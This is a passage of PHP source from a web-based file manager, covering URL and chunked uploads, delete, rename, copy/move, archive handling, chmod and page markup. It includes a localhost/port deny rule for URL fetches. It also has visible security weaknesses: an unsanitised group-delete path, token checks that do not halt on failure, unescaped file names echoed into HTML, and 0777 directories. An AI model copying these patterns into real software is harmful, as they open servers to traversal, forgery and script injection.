        $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null;

        $domain = parse_url($url, PHP_URL_HOST);
        $port = parse_url($url, PHP_URL_PORT);
        $knownPorts = [22, 23, 25, 3306];

        if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) {
            $err = array("message" => "URL is not allowed");
            event_callback(array("fail" => $err));
            exit();
        }

        $use_curl = false;
        $temp_file = tempnam(sys_get_temp_dir(), "upload-");
        $fileinfo = new stdClass();
        $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20");

        $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;
        $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION));
        $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

        $err = false;

        if(!$isFileAllowed) {
            $err = array("message" => "File extension is not allowed");
            event_callback(array("fail" => $err));
            exit();
        }

        if (!$url) {
            $success = false;
        } else if ($use_curl) {
            @$fp = fopen($temp_file, "w");
            @$ch = curl_init($url);
            curl_setopt($ch, CURLOPT_NOPROGRESS, false );
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_FILE, $fp);
            @$success = curl_exec($ch);
            $curl_info = curl_getinfo($ch);
            if (!$success) {
                $err = array("message" => curl_error($ch));
            }
            @curl_close($ch);
            fclose($fp);
            $fileinfo->size = $curl_info["size_download"];
            $fileinfo->type = $curl_info["content_type"];
        } else {
            $ctx = stream_context_create();
            @$success = copy($url, $temp_file, $ctx);
            if (!$success) {
                $err = error_get_last();
            }
        }

        if ($success) {
            $success = rename($temp_file, strtok(get_file_path(), '?'));
        }

        if ($success) {
            event_callback(array("done" => $fileinfo));
        } else {
            unlink($temp_file);
            if (!$err) {
                $err = array("message" => "Invalid url parameter");
            }
            event_callback(array("fail" => $err));
        }
    }
    exit();
}

if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) {
    $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) );
    if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        $is_dir = is_dir($path . '/' . $del);
        if (fm_rdelete($path . '/' . $del)) {
            $msg = $is_dir ? lng('Folder').' <b>%s</b> '.lng('Deleted') : lng('File').' <b>%s</b> '.lng('Deleted');
            fm_set_msg(sprintf($msg, fanco($del)));
        } else {
            $msg = $is_dir ? lng('Folder').' <b>%s</b> '.lng('not deleted') : lng('File').' <b>%s</b> '.lng('not deleted');
            fm_set_msg(sprintf($msg, fanco($del)), 'error');
        }
    } else {
        fm_set_msg(lng('Invalid file or folder name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Create a new file/folder
if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) {
    $type = urldecode($_POST['newfile']);
    $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) );
    if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        if ($type == "file") {
            if (!file_exists($path . '/' . $new)) {
                if(fm_is_valid_ext($new)) {
                    @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);
                    fm_set_msg(sprintf(lng('File').' <b>%s</b> '.lng('Created'), fanco($new)));
                } else {
                    fm_set_msg(lng('File extension is not allowed'), 'error');
                }
            } else {
                fm_set_msg(sprintf(lng('File').' <b>%s</b> '.lng('already exists'), fanco($new)), 'alert');
            }
        } else {
            if (fm_mkdir($path . '/' . $new, false) === true) {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('Created'), $new));
            } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('already exists'), fanco($new)), 'alert');
            } else {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('not created'), fanco($new)), 'error');
            }
        }
    } else {
        fm_set_msg(lng('Invalid characters in file or folder name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Copy folder / file
if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) {
    // from
    $copy = urldecode($_GET['copy']);
    $copy = fm_clean_path($copy);
    // empty path
    if ($copy == '') {
        fm_set_msg(lng('Source path not defined'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $from = FM_ROOT_PATH . '/' . $copy;

    $dest = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $dest .= '/' . FM_PATH;
    }
    $dest .= '/' . basename($from);

    $move = isset($_GET['move']);
    $move = fm_clean_path(urldecode($move));

    if ($from != $dest) {
        $msg_from = trim(FM_PATH . '/' . basename($from), '/');
        if ($move) {
            $rename = fm_rename($from, $dest);
            if ($rename) {
                fm_set_msg(sprintf(lng('Moved from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)));
            } elseif ($rename === null) {
                fm_set_msg(lng('File or folder with this path already exists'), 'alert');
            } else {
                fm_set_msg(sprintf(lng('Error while moving from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)), 'error');
            }
        } else { 
            if (fm_rcopy($from, $dest)) {
                fm_set_msg(sprintf(lng('Copied from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)));
            } else {
                fm_set_msg(sprintf(lng('Error while copying from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)), 'error');
            }
        }
    } else {
       if (!$move){ 
            $msg_from = trim(FM_PATH . '/' . basename($from), '/');
            $fn_parts = pathinfo($from);
            $extension_suffix = '';
            if(!is_dir($from)){
               $extension_suffix = '.'.$fn_parts['extension'];
            }

            $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix;
            $loop_count = 0;
            $max_loop = 1000;
            
            while(file_exists($fn_duplicate) & $loop_count < $max_loop){
               $fn_parts = pathinfo($fn_duplicate);
               $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix;
               $loop_count++;
            }
            if (fm_rcopy($from, $fn_duplicate, False)) {
                fm_set_msg(sprintf('Copied from <b>%s</b> to <b>%s</b>', fanco($copy), fanco($fn_duplicate)));
            } else {
                fm_set_msg(sprintf('Error while copying from <b>%s</b> to <b>%s</b>', fanco($copy), fanco($fn_duplicate)), 'error');
            }
       }
       else{
           fm_set_msg(lng('Paths must be not equal'), 'alert');
       }
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng('Invalid Token.'), 'error');
    }
    
    // from
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    // to
    $copy_to_path = FM_ROOT_PATH;
    $copy_to = fm_clean_path($_POST['copy_to']);
    if ($copy_to != '') {
        $copy_to_path .= '/' . $copy_to;
    }
    if ($path == $copy_to_path) {
        fm_set_msg(lng('Paths must be not equal'), 'alert');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
    if (!is_dir($copy_to_path)) {
        if (!fm_mkdir($copy_to_path, true)) {
            fm_set_msg('Unable to create destination folder', 'error');
            $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        }
    }
    // move?
    $move = isset($_POST['move']);
    // copy/move
    $errors = 0;
    $files = $_POST['file'];
    if (is_array($files) and count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $f = fm_clean_path($f);

                $from = $path . '/' . $f;

                $dest = $copy_to_path . '/' . $f;

                if ($move) {
                    $rename = fm_rename($from, $dest);
                    if ($rename === false) {
                        $errors++;
                    }
                } else {
                    if (!fm_rcopy($from, $dest)) {
                        $errors++;
                    }
                }
            }
        }
        if ($errors == 0) {
            $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied';
            fm_set_msg($msg);
        } else {
            $msg = $move ? 'Error while moving items' : 'Error while copying items';
            fm_set_msg($msg, 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Rename
if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) {
    if(!verifyToken($_POST['token'])) {
        fm_set_msg("Invalid Token.", 'error');
    }
    // old name
    $old = urldecode($_POST['rename_from']);
    $old = fm_clean_path($old);
    $old = str_replace('/', '', $old);
    // new name
    $new = urldecode($_POST['rename_to']);
    $new = fm_clean_path(strip_tags($new));
    $new = str_replace('/', '', $new);
    // path
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    // rename
    if (fm_isvalid_filename($new) and $old != '' and $new != '') {
        if (fm_rename($path . '/' . $old, $path . '/' . $new)) {
            fm_set_msg(sprintf(lng('Renamed from').' <b>%s</b> '. lng('to').' <b>%s</b>', fanco($old), fanco($new)));
        } else {
            fm_set_msg(sprintf(lng('Error while renaming from').' <b>%s</b> '. lng('to').' <b>%s</b>', fanco($old), fanco($new)), 'error');
        }
    } else {
        fm_set_msg(lng('Invalid characters in file name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Download
if (isset($_GET['dl'], $_POST['token'])) {
    if(!verifyToken($_POST['token'])) {
        fm_set_msg("Invalid Token.", 'error');
    }

    $dl = urldecode($_GET['dl']);
    $dl = fm_clean_path($dl);
    $dl = str_replace('/', '', $dl);
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    if ($dl != '' and is_file($path . '/' . $dl)) {
        fm_download_file($path . '/' . $dl, $dl, 1024);
        exit;
    } else {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
}

// Upload
if (!empty($_FILES) and !FM_READONLY) {
    if(isset($_POST['token'])) {
        if(!verifyToken($_POST['token'])) {
            $response = array ('status' => 'error','info' => "Invalid Token.");
            echo json_encode($response); exit();
        }
    } else {
        $response = array ('status' => 'error','info' => "Token Missing.");
        echo json_encode($response); exit();
    }

    $chunkIndex = $_POST['dzchunkindex'];
    $chunkTotal = $_POST['dztotalchunkcount'];
    $fullPathInput = fm_clean_path($_REQUEST['fullpath']);

    $f = $_FILES;
    $path = FM_ROOT_PATH;
    $ds = DIRECTORY_SEPARATOR;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $errors = 0;
    $uploads = 0;
    $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;
    $response = array (
        'status' => 'error',
        'info'   => 'Oops! Try again'
    );

    $filename = $f['file']['name'];
    $tmp_name = $f['file']['tmp_name'];
    $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : '';
    $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

    if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) {
        $response = array (
            'status'    => 'error',
            'info'      => "Invalid File name!",
        );
        echo json_encode($response); exit();
    }

    $targetPath = $path . $ds;
    if ( is_writable($targetPath) ) {
        $fullPath = $path . '/' . $fullPathInput;
        $folder = substr($fullPath, 0, strrpos($fullPath, "/"));

        if (!is_dir($folder)) {
            $old = umask(0);
            mkdir($folder, 0777, true);
            umask($old);
        }
        if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) {
            if ($chunkTotal){
                $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab");
                if ($out) {
                    $in = @fopen($tmp_name, "rb");
                    if ($in) {
                        if (PHP_VERSION_ID < 80009) {
                            do {
                                for (;;) {
                                    $buff = fread($in, 4096);
                                    if ($buff === false || $buff === '') {
                                        break;
                                    }
                                    fwrite($out, $buff);
                                }
                            } while (!feof($in));
                        } else {
                            stream_copy_to_stream($in, $out);
                        }
                        $response = array (
                            'status'    => 'success',
                            'info' => "file upload successful"
                        );
                    } else {
                        $response = array (
                        'status'    => 'error',
                        'info' => "failed to open output stream",
                        'errorDetails' => error_get_last()
                        );
                    }
                    @fclose($in);
                    @fclose($out);
                    @unlink($tmp_name);

                    $response = array (
                        'status'    => 'success',
                        'info' => "file upload successful"
                    );
                } else {
                    $response = array (
                        'status'    => 'error',
                        'info' => "failed to open output stream"
                        );
                }

                if ($chunkIndex == $chunkTotal - 1) {
                    if (file_exists ($fullPath)) {
                        $ext_1 = $ext ? '.'.$ext : '';
                        $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1;
                    } else {
                        $fullPathTarget = $fullPath;
                    }
                    rename("{$fullPath}.part", $fullPathTarget);
                }

            } else {
                if (rename($tmp_name, $fullPath)) {
                    if ( file_exists($fullPath) ) {
                        $response = array (
                            'status'    => 'success',
                            'info' => "file upload successful"
                        );
                    } else {
                        $response = array (
                            'status' => 'error',
                            'info'   => 'Couldn\'t upload the requested file.'
                        );
                    }
                } else {
                    $response = array (
                        'status'    => 'error',
                        'info'      => "Error while uploading files. Uploaded files $uploads",
                    );
                }
            }
        }
    } else {
        $response = array (
            'status' => 'error',
            'info'   => 'The specified folder for upload isn\'t writeable.'
        );
    }
    // Return the response
    echo json_encode($response);
    exit();
}


if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $errors = 0;
    $files = $_POST['file'];
    if (is_array($files) and count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $new_path = $path . '/' . $f;
                if (!fm_rdelete($new_path)) {
                    $errors++;
                }
            }
        }
        if ($errors == 0) {
            fm_set_msg(lng('Selected files and folder deleted'));
        } else {
            fm_set_msg(lng('Error while deleting items'), 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $path = FM_ROOT_PATH;
    $ext = 'zip';
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    //set pack type
    $ext = isset($_POST['tar']) ? 'tar' : 'zip';

    if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) {
        fm_set_msg(lng('Operations with archives are not available'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $files = $_POST['file'];
    $sanitized_files = array();

    // clean path
    foreach($files as $file){
        array_push($sanitized_files, fm_clean_path($file));
    }
    
    $files = $sanitized_files;
    
    if (!empty($files)) {
        chdir($path);

        if (count($files) == 1) {
            $one_file = reset($files);
            $one_file = basename($one_file);
            $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext;
        } else {
            $zipname = 'archive_' . date('ymd_His') . '.'.$ext;
        }

        if($ext == 'zip') {
            $zipper = new FM_Zipper();
            $res = $zipper->create($zipname, $files);
        } elseif ($ext == 'tar') {
            $tar = new FM_Zipper_Tar();
            $res = $tar->create($zipname, $files);
        }

        if ($res) {
            fm_set_msg(sprintf(lng('Archive').' <b>%s</b> '.lng('Created'), fanco($zipname)));
        } else {
            fm_set_msg(lng('Archive not created'), 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Unpack zip, tar
if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $unzip = urldecode($_POST['unzip']);
    $unzip = fm_clean_path($unzip);
    $unzip = str_replace('/', '', $unzip);
    $isValid = false;

    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    if ($unzip != '' and is_file($path . '/' . $unzip)) {
        $zip_path = $path . '/' . $unzip;
        $ext = pathinfo($zip_path, PATHINFO_EXTENSION);
        $isValid = true;
    } else {
        fm_set_msg(lng('File not found'), 'error');
    }

    if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) {
        fm_set_msg(lng('Operations with archives are not available'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    if ($isValid) {
        //to folder
        $tofolder = '';
        if (isset($_POST['tofolder'])) {
            $tofolder = pathinfo($zip_path, PATHINFO_FILENAME);
            if (fm_mkdir($path . '/' . $tofolder, true)) {
                $path .= '/' . $tofolder;
            }
        }

        if($ext == "zip") {
            $zipper = new FM_Zipper();
            $res = $zipper->unzip($zip_path, $path);
        } elseif ($ext == "tar") {
            try {
                $gzipper = new PharData($zip_path);
                if (@$gzipper->extractTo($path,null, true)) {
                    $res = true;
                } else {
                    $res = false;
                }
            } catch (Exception $e) {

                $res = true;
            }
        }

        if ($res) {
            fm_set_msg(lng('Archive unpacked'));
        } else {
            fm_set_msg(lng('Archive not unpacked'), 'error');
        }
    } else {
        fm_set_msg(lng('File not found'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }
    
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $file = $_POST['chmod'];
    $file = fm_clean_path($file);
    $file = str_replace('/', '', $file);
    if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $mode = 0;
    if (!empty($_POST['ur'])) {
        $mode |= 0400;
    }
    if (!empty($_POST['uw'])) {
        $mode |= 0200;
    }
    if (!empty($_POST['ux'])) {
        $mode |= 0100;
    }
    if (!empty($_POST['gr'])) {
        $mode |= 0040;
    }
    if (!empty($_POST['gw'])) {
        $mode |= 0020;
    }
    if (!empty($_POST['gx'])) {
        $mode |= 0010;
    }
    if (!empty($_POST['or'])) {
        $mode |= 0004;
    }
    if (!empty($_POST['ow'])) {
        $mode |= 0002;
    }
    if (!empty($_POST['ox'])) {
        $mode |= 0001;
    }

    if (@chmod($path . '/' . $file, $mode)) {
        fm_set_msg(lng('Permissions changed'));
    } else {
        fm_set_msg(lng('Permissions not changed'), 'error');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


$path = FM_ROOT_PATH;
if (FM_PATH != '') {
    $path .= '/' . FM_PATH;
}

if (!is_dir($path)) {
    fm_redirect(FM_SELF_URL . '?p=');
}

$parent = fm_get_parent_path(FM_PATH);

$objects = is_readable($path) ? scandir($path) : array();
$folders = array();
$files = array();
$current_path = array_slice(explode("/",$path), -1)[0];
if (is_array($objects) and fm_is_exclude_items($current_path)) {
    foreach ($objects as $file) {
        if ($file == '.' || $file == '..') {
            continue;
        }
        if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') {
            continue;
        }
        $new_path = $path . '/' . $file;
        if (@is_file($new_path) and fm_is_exclude_items($file)) {
            $files[] = $file;
        } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) {
            $folders[] = $file;
        }
    }
}

if (!empty($files)) {
    natcasesort($files);
}
if (!empty($folders)) {
    natcasesort($folders);
}

if (isset($_GET['upload']) and !FM_READONLY) {
    fm_show_header(); 
    fm_show_nav_path(FM_PATH); 
    function getUploadExt() {
        $extArr = explode(',', FM_UPLOAD_EXTENSION);
        if(FM_UPLOAD_EXTENSION and $extArr) {
            array_walk($extArr, function(&$x) {$x = ".$x";});
            return implode(',', $extArr);
        }
        return '';
    }
    ?>
    <?php print_external('css-dropzone'); ?>
    <div class="path">

        <div class="card mb-2 fm-upload-wrapper <?php echo fm_get_theme(); ?>">
            <div class="card-header">
                <ul class="nav nav-tabs card-header-tabs">
                    <li class="nav-item">
                        <a class="nav-link active" href="#fileUploader" data-target="#fileUploader"><i class="fa fa-arrow-circle-o-up"></i> <?php echo lng('UploadingFiles') ?></a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="#urlUploader" class="js-url-upload" data-target="#urlUploader"><i class="fa fa-link"></i> <?php echo lng('Upload from URL') ?></a>
                    </li>
                </ul>
            </div>
            <div class="card-body">
                <p class="card-text">
                    <a href="?p=<?php echo FM_PATH ?>" class="float-right"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back')?></a>
                    <strong><?php echo lng('DestinationFolder') ?></strong>: <?php echo fanco(fm_convert_win(FM_PATH)) ?>
                </p>

                <form action="<?php echo htmlspecialchars(FM_SELF_URL) . '?p=' . fanco(FM_PATH) ?>" class="dropzone card-tabs-container" id="fileUploader" enctype="multipart/form-data">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="fullpath" id="fullpath" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <div class="fallback">
                        <input name="file" type="file" multiple/>
                    </div>
                </form>

                <div class="upload-url-wrapper card-tabs-container hidden" id="urlUploader">
                    <form id="js-form-url-upload" class="row row-cols-lg-auto g-3 align-items-center" onsubmit="return upload_from_url(this);" method="POST" action="">
                        <input type="hidden" name="type" value="upload" aria-label="hidden" aria-hidden="true">
                        <input type="url" placeholder="URL" name="uploadurl" required class="form-control" style="width: 80%">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <button type="submit" class="btn btn-primary ms-3"><?php echo lng('Upload') ?></button>
                        <div class="lds-facebook"><div></div><div></div><div></div></div>
                    </form>
                    <div id="js-url-upload__list" class="col-9 mt-3"></div>
                </div>
            </div>
        </div>
    </div>
    <?php print_external('js-dropzone'); ?>
    <script>
        Dropzone.options.fileUploader = {
            chunking: true,
            chunkSize: <?php echo UPLOAD_CHUNK_SIZE; ?>,
            forceChunking: true,
            retryChunks: true,
            retryChunksLimit: 3,
            parallelUploads: 1,
            parallelChunkUploads: false,
            timeout: 120000,
            maxFilesize: "<?php echo MAX_UPLOAD_SIZE; ?>",
            acceptedFiles : "<?php echo getUploadExt() ?>",
            init: function () {
                this.on("sending", function (file, xhr, formData) {
                    let _path = (file.fullPath) ? file.fullPath : file.name;
                    document.getElementById("fullpath").value = _path;
                    xhr.ontimeout = (function() {
                        toast('Error: Server Timeout');
                    });
                }).on("success", function (res) {
                    try {
                        let _response = JSON.parse(res.xhr.response);

                        if(_response.status == "error") {
                            toast(_response.info);
                        }
                    } catch (e) {
                        toast("Error: Invalid JSON response");
                    }
                }).on("error", function(file, response) {
                    toast(response);
                });
            }
        }
    </script>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_POST['copy']) and !FM_READONLY) {
    $copy_files = isset($_POST['file']) ? $_POST['file'] : null;
    if (!is_array($copy_files) || empty($copy_files)) {
        fm_set_msg(lng('Nothing selected'), 'alert');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    ?>
    <div class="path">
        <div class="card <?php echo fm_get_theme(); ?>">
            <div class="card-header">
                <h6><?php echo lng('Copying') ?></h6>
            </div>
            <div class="card-body">
                <form action="" method="post">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="finish" value="1">
                    <?php
                    foreach ($copy_files as $cf) {
                        echo '<input type="hidden" name="file[]" value="' . fanco($cf) . '">' . PHP_EOL;
                    }
                    ?>
                    <p class="break-word"><strong><?php echo lng('Files') ?></strong>: <b><?php echo implode('</b>, <b>', $copy_files) ?></b></p>
                    <p class="break-word"><strong><?php echo lng('SourceFolder') ?></strong>: <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?><br>
                        <label for="inp_copy_to"><strong><?php echo lng('DestinationFolder') ?></strong>:</label>
                        <?php echo FM_ROOT_PATH ?>/<input type="text" name="copy_to" id="inp_copy_to" value="<?php echo fanco(FM_PATH) ?>">
                    </p>
                    <p class="custom-checkbox custom-control"><input type="checkbox" name="move" value="1" id="js-move-files" class="custom-control-input"><label for="js-move-files" class="custom-control-label ms-2"> <?php echo lng('Move') ?></label></p>
                    <p>
                        <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-danger"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b>&nbsp;
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Copy') ?></button> 
                    </p>
                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['copy']) and !isset($_GET['finish']) and !FM_READONLY) {
    $copy = $_GET['copy'];
    $copy = fm_clean_path($copy);
    if ($copy == '' || !file_exists(FM_ROOT_PATH . '/' . $copy)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); 
    fm_show_nav_path(FM_PATH); 
    ?>
    <div class="path">
        <p><b>Copying</b></p>
        <p class="break-word">
            <strong>Source path:</strong> <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . $copy)) ?><br>
            <strong>Destination folder:</strong> <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?>
        </p>
        <p>
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode($copy) ?>&amp;finish=1"><i class="fa fa-check-circle"></i> Copy</a></b> &nbsp;
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode($copy) ?>&amp;finish=1&amp;move=1"><i class="fa fa-check-circle"></i> Move</a></b> &nbsp;
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="text-danger"><i class="fa fa-times-circle"></i> Cancel</a></b>
        </p>
        <p><i><?php echo lng('Select folder') ?></i></p>
        <ul class="folders break-word">
            <?php
            if ($parent !== false) {
                ?>
                <li><a href="?p=<?php echo urlencode($parent) ?>&amp;copy=<?php echo urlencode($copy) ?>"><i class="fa fa-chevron-circle-left"></i> ..</a></li>
                <?php
            }
            foreach ($folders as $f) {
                ?>
                <li>
                    <a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>&amp;copy=<?php echo urlencode($copy) ?>"><i class="fa fa-folder-o"></i> <?php echo fm_convert_win($f) ?></a></li>
                <?php
            }
            ?>
        </ul>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['settings']) and !FM_READONLY) {
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    global $cfg, $lang, $lang_list;
    ?>

    <div class="col-md-8 offset-md-2 pt-3">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header d-flex justify-content-between">
                <span><i class="fa fa-cog"></i>  <?php echo lng('Settings') ?></span>
                <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel')?></a>
            </h6>
            <div class="card-body">
                <form id="js-settings-form" action="" method="post" data-type="ajax" onsubmit="return save_settings(this)">
                    <input type="hidden" name="type" value="settings" aria-label="hidden" aria-hidden="true">
                    <div class="form-group row">
                        <label for="js-language" class="col-sm-3 col-form-label"><?php echo lng('Language') ?></label>
                        <div class="col-sm-5">
                            <select class="form-select" id="js-language" name="js-language">
                                <?php
                                function getSelected($l) {
                                    global $lang;
                                    return ($lang == $l) ? 'selected' : '';
                                }
                                foreach ($lang_list as $k => $v) {
                                    echo "<option value='$k' ".getSelected($k).">$v</option>";
                                }
                                ?>
                            </select>
                        </div>
                    </div>
                    <div class="mt-3 mb-3 row ">
                        <label for="js-error-report" class="col-sm-3 col-form-label"><?php echo lng('ErrorReporting') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
